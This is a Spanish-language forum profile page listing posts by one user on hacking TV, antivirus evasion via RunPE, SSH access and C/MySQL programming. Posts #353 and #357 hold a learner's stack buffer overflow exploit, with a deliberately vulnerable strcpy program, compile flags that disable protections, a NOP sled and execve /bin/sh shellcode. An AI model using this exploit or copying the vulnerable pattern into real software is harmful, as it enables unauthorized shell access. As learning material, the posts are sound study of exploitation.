Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Belial & Grimoire

#351
Foro Libre / Re: Mundo Hacker TV
7 Febrero 2011, 07:46 AM
este programa se puede ver en vivo desde otro pais o solo es local y tengo que esperar a que suban los videos en la web?
#352
eso estaria genial, bueno... solo si el cristal es resistente, porque sino imagina que se te caiga y alli tuvieras toda tu informacion.... cada pedazo que recogieras del suelo sentirias calambres es el estomago XD

#353
sip, lo hice con tu codigo, y lo unico que cambie fue "./vuln"

y al ejecutarlo me aparece esto

�����������������������1�Ph//shh/bin��P��S���

y vuln lo compile asi exactamente

gcc -o vuln vuln.c --no-stack-protector -g -z execstack

y haciendo esto


sprintf(cmd,"%s %s%s%s", exp, nops, shellcode, ret);


me dice.... Segmentation fault

#354
hola

desde hace un tiempo e tenido una duda sobre la seguridad en los antivirus....

hasta donde tengo entendido, todos ellos se van a las conferencias en donde hackers hablan de tecnicas e inovaciones, asi como tambien todo el tiempo estan checando estos foros para sabes que nuevas tecnicas hay actualmente, etc.

pero si hacen todo eso... que es lo que evita que ellos no logren detener todo eso?, por ejemplo, no se cuanto tiempo lleva lo de runPE pero he visto informacion desde el 2009 sobre esto, y los antivirus no lo detectan aun, y han habido tecnicas bastante documentadas que al dia de hoy pueden ser implementadas y los antivirus siguen sin detectarlas... y pues a mi se me hace raro

Digo si yo hiciera un antivirus y me documentara de muchas tecnicas que he descubierto en foros, conferencias, o busquedas en archivos sospechosos, pues lo primero que haria como seguridad seria implementar una forma de detenerlo o minino alarmar sobre el intento que se haya hecho.

alguien podria decirme su opinion del porque estas tecnicas que hay en lo foros y que son muy documentadas... porque los programas que se dedican a la seguridad no hacen nada?

tengo que decir que se que en los foros, muchas veces hay foros privados para solo personas elegidas y que se descubren tecnicas pero que no se muestran a nadie... y pues alli estoy deacuerdo que los programas de seguridad no hagan algo, pero porque lo documentado o ya muy conocido sigue sin ser detenido?

debe haber alguna razon para no hacerlo, sera por negocio o porque mas?
#355
Hola

alguien podria ayudarme con esto... estoy tartando de aprender sobre RunPE... hay un tuto muy bueno que hizo ferchu y lo trate de seguir, estoy utilizando win7 en virtualbox y no he logrado hacer que funcione, al principio tuve problemas pero logre solucionar el primer ejemplo, pero el segundo ejemplo que él pone, ya no lo logre, segui todos los pasos, y con lo que solucione el primer ejemplo trate de hacerlo en el segundo, pero solo me aparece una pantalla negra diciendo que que ya no es una aplicacion win32

les pongo los archivos el original y el modificado... aun no se que pudo estar mal, espero me pueden decir para poder avanzar porfavor

original notpad

http://www.megaupload.com/?d=NWMSREOW

modificado notepad

http://www.megaupload.com/?d=UBS18P3O

salu2  ;D
#356
hola

una duda... si instalo un servidor ssh en linux, aunque mi conexion tenga router puedo entrar desde otra computadora?, lo digo porque creo mi router no permite conexiones entrantes, me imagino que si tendre que abrir el puerto para tener acceso no?

pero y si deje la computadora en otro lugar donde no tiene ese puerto abierto y necesito conectarm a mi lap... se podra? o ya de esa manera no hay posibilidad de hacerlo?

salu2
#357
pues yo tambien lo intente y no me funciono, ya trate de modificar los nops, no se si sea igual en linux, pero en windows tenia que dejar ret exacto en EIP para que saltara y se creara la shell

pues lo intente y no me funciona... sera por alguna razon de sistemas linux, yo utilizo debian suqeeze

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(){

char exp[] = "./vuln";
char nops[23] = "";
memset(nops, '\x90', 23);
char shellcode[]="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
char ret[]="\x18\x1f\x9b\xbf";

char *cmd;
cmd=(char *)malloc(strlen(exp) + strlen(nops) + strlen(shellcode) + strlen(ret) + 1);

sprintf(cmd,"%s %s %s %s", exp, nops, shellcode, ret);

system(cmd);
free(cmd);

return 0;
}


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void soy_vuln(char *arg){

char buff[48];
strcpy(buff, arg);
printf("%s", buff);
}

int main(int argc, char *argv[]){

if(argc != 2) return 1;

soy_vuln(argv[1]);
}
#358

pero de esa forma me parece todos los registro... y solo quiero guardarlos y utilizar el que necesite... habra otra forma?
#359
hola

tengo una duda con este codigo, estaba estudiando como conectarme en C con mysql y ya entendi, pero ahora quise tomar la informacion de tabla con SELECT * FROM y si todo lo hago desde el mismo while, me aparece bien todo, pero no logro hacer que pueda guardar la informacion y despues usarla en otra parte del codigo

Les dejo el codigo, asi como lo pongo me funciona pero solo 1 informacion... pero si a esto

printf("%d %s\n",i , first[2]);

le pongo 1, me aparece esto ("") y si le pongo 0 me dice (Null).

alguien sabe como puedo tomar la informacion de SELECT y usarla en alguna zona distinta, por cierto lo estoy haciendo en linux

#include <mysql.h>
#include <stdio.h>

MYSQL *conn;
MYSQL_RES *res;
MYSQL_ROW row;
char *id;
char *first[5];
char *last;
int i = 0;

int main(){

char *server = "localhost";
char *user = "root";
char *password = "toor";
char *database = "database";

conn = mysql_init(NULL);

if(!mysql_real_connect(conn, server, user, password, database, 0, NULL, 0)){
fprintf(stderr, "%s\n", mysql_error(conn));}

if (mysql_query(conn, "show tables")){
fprintf(stderr, "%s\n", mysql_error(conn));}

res = mysql_use_result(conn);

printf("Base de datos en mysql: \n");
while((row = mysql_fetch_row(res)) != NULL){
printf("%s \n", row[0]);}

if (mysql_query(conn, "SELECT * FROM contacts")){
fprintf(stderr, "%s\n", mysql_error(conn));}

res = mysql_use_result(conn);

/////////////////////////////////////////////////////// ESTO ES LO QUE NO ME FUNCIONA////////////////////////

while((row = mysql_fetch_row(res)) != NULL){
i = i + 1;
first[i] = row[i];

}

printf("%d %s\n",i , first[0]);

//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
mysql_free_result(res);
mysql_close(conn);

return 0;

}


salu2
#360
hola

tambien inscribanme a mi, solo que aqui son 7 horas de diferencia, seria las 6 a.m, a ver si hay otro horario, sino pues nimodo jeje

salu2